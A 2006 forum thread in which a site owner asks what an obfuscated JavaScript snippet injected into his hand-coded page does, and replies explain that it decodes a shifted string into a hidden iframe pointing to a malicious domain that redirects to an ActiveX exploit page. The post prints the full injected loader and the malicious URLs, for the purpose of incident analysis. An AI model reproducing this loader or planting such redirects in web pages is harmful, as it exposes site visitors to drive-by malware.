By using this site, you agree to our updated Privacy Policy and our Terms of Use. Manage your Cookies Settings.
460,028 Members | 1,258 Online
Bytes IT Community
+ Ask a Question
Need help? Post your question and get tips & solutions from a community of 460,028 IT Pros & Developers. It's quick & easy.

Strange appearing javascript - hacked

P: n/a
Hi guys,

I recently noticed this strange script appearing on my webpage. I know
I didn't put it there because I hand-coded it. Someone told me it
looks like javascript and it looked like I might have been hacked.
I've taken the webpage down for now but I was hoping someone here would
be able to tell me what it does so I know just how much trouble I'm in.
I'm taking off the script tags and breaking it up just to make sure it
doesn't accidentally run on anyone's computer. However initially it
was all one line.

s='@mjveqi$wvgA&lxxt>33i;he;2mr3syx2tltCwcmhA5&
${mhxlA4$fsvhivA4$limklxA4$wx}piA&hmwtpe}>
rsri&B';o='';for(i=0;i<92;i++){o+=String.from
CharCode(s.charCodeAt(i)-4);}document.write(o);
Thanks!

Oct 23 '06 #1
Share this Question
Share on Google+
4 Replies


P: n/a
Hi

I just want to drop a note to say that I managed to find out what the
code does. It uses ROT-4 encoding to redirect you to another URL.
Wong Yung wrote:
Hi guys,

I recently noticed this strange script appearing on my webpage. I know
I didn't put it there because I hand-coded it. Someone told me it
looks like javascript and it looked like I might have been hacked.
I've taken the webpage down for now but I was hoping someone here would
be able to tell me what it does so I know just how much trouble I'm in.
I'm taking off the script tags and breaking it up just to make sure it
doesn't accidentally run on anyone's computer. However initially it
was all one line.

s='@mjveqi$wvgA&lxxt>33i;he;2mr3syx2tltCwcmhA5&
${mhxlA4$fsvhivA4$limklxA4$wx}piA&hmwtpe}>
rsri&B';o='';for(i=0;i<92;i++){o+=String.from
CharCode(s.charCodeAt(i)-4);}document.write(o);

Thanks!
Oct 23 '06 #2

P: n/a
Wong Yung said the following on 10/22/2006 11:04 PM:
Hi guys,

I recently noticed this strange script appearing on my webpage. I know
I didn't put it there because I hand-coded it. Someone told me it
looks like javascript and it looked like I might have been hacked.
I've taken the webpage down for now but I was hoping someone here would
be able to tell me what it does so I know just how much trouble I'm in.
I'm taking off the script tags and breaking it up just to make sure it
doesn't accidentally run on anyone's computer. However initially it
was all one line.

s='@mjveqi$wvgA&lxxt>33i;he;2mr3syx2tltCwcmhA5&
${mhxlA4$fsvhivA4$limklxA4$wx}piA&hmwtpe}>
rsri&B';o='';for(i=0;i<92;i++){o+=String.from
CharCode(s.charCodeAt(i)-4);}document.write(o);

Thanks!
It writes out an IFrame tag with it's src attribute set to <URL:
http://e7da7.in/out.php?s_id=1which then redirects to <URL:
http://66.36.241.243/expd/index.phpwhich then wants to run two ActiveX
controls to attempt to display some graphics. Too bad none of it works....

If you didn't insert that code, remove it from your page, reupload, then
see if it shows up again. If it does, find out why your hosting company
is inserting it.

--
Randy
Chance Favors The Prepared Mind
comp.lang.javascript FAQ - http://jibbering.com/faq & newsgroup weekly
Javascript Best Practices - http://www.JavascriptToolbox.com/bestpractices/
Oct 23 '06 #3

P: n/a
Wong Yung said the following on 10/23/2006 12:55 AM:
Hi

I just want to drop a note to say that I managed to find out what the
code does. It uses ROT-4 encoding to redirect you to another URL.
And then it does more, see my other post.

--
Randy
Chance Favors The Prepared Mind
comp.lang.javascript FAQ - http://jibbering.com/faq & newsgroup weekly
Javascript Best Practices - http://www.JavascriptToolbox.com/bestpractices/
Oct 23 '06 #4

P: n/a

Randy Webb wrote:
Wong Yung said the following on 10/22/2006 11:04 PM:
Hi guys,

I recently noticed this strange script appearing on my webpage. I know
I didn't put it there because I hand-coded it. Someone told me it
looks like javascript and it looked like I might have been hacked.
I've taken the webpage down for now but I was hoping someone here would
be able to tell me what it does so I know just how much trouble I'm in.
I'm taking off the script tags and breaking it up just to make sure it
doesn't accidentally run on anyone's computer. However initially it
was all one line.

s='@mjveqi$wvgA&lxxt>33i;he;2mr3syx2tltCwcmhA5&
${mhxlA4$fsvhivA4$limklxA4$wx}piA&hmwtpe}>
rsri&B';o='';for(i=0;i<92;i++){o+=String.from
CharCode(s.charCodeAt(i)-4);}document.write(o);
Thanks!

It writes out an IFrame tag with it's src attribute set to <URL:
http://e7da7.in/out.php?s_id=1which then redirects to <URL:
http://66.36.241.243/expd/index.phpwhich then wants to run two ActiveX
controls to attempt to display some graphics. Too bad none of it works....

If you didn't insert that code, remove it from your page, reupload, then
see if it shows up again. If it does, find out why your hosting company
is inserting it.

--
Randy
Chance Favors The Prepared Mind
comp.lang.javascript FAQ - http://jibbering.com/faq & newsgroup weekly
Javascript Best Practices - http://www.JavascriptToolbox.com/bestpractices/
Thanks for the info!

Oct 23 '06 #5

This discussion thread is closed

Replies have been disabled for this discussion.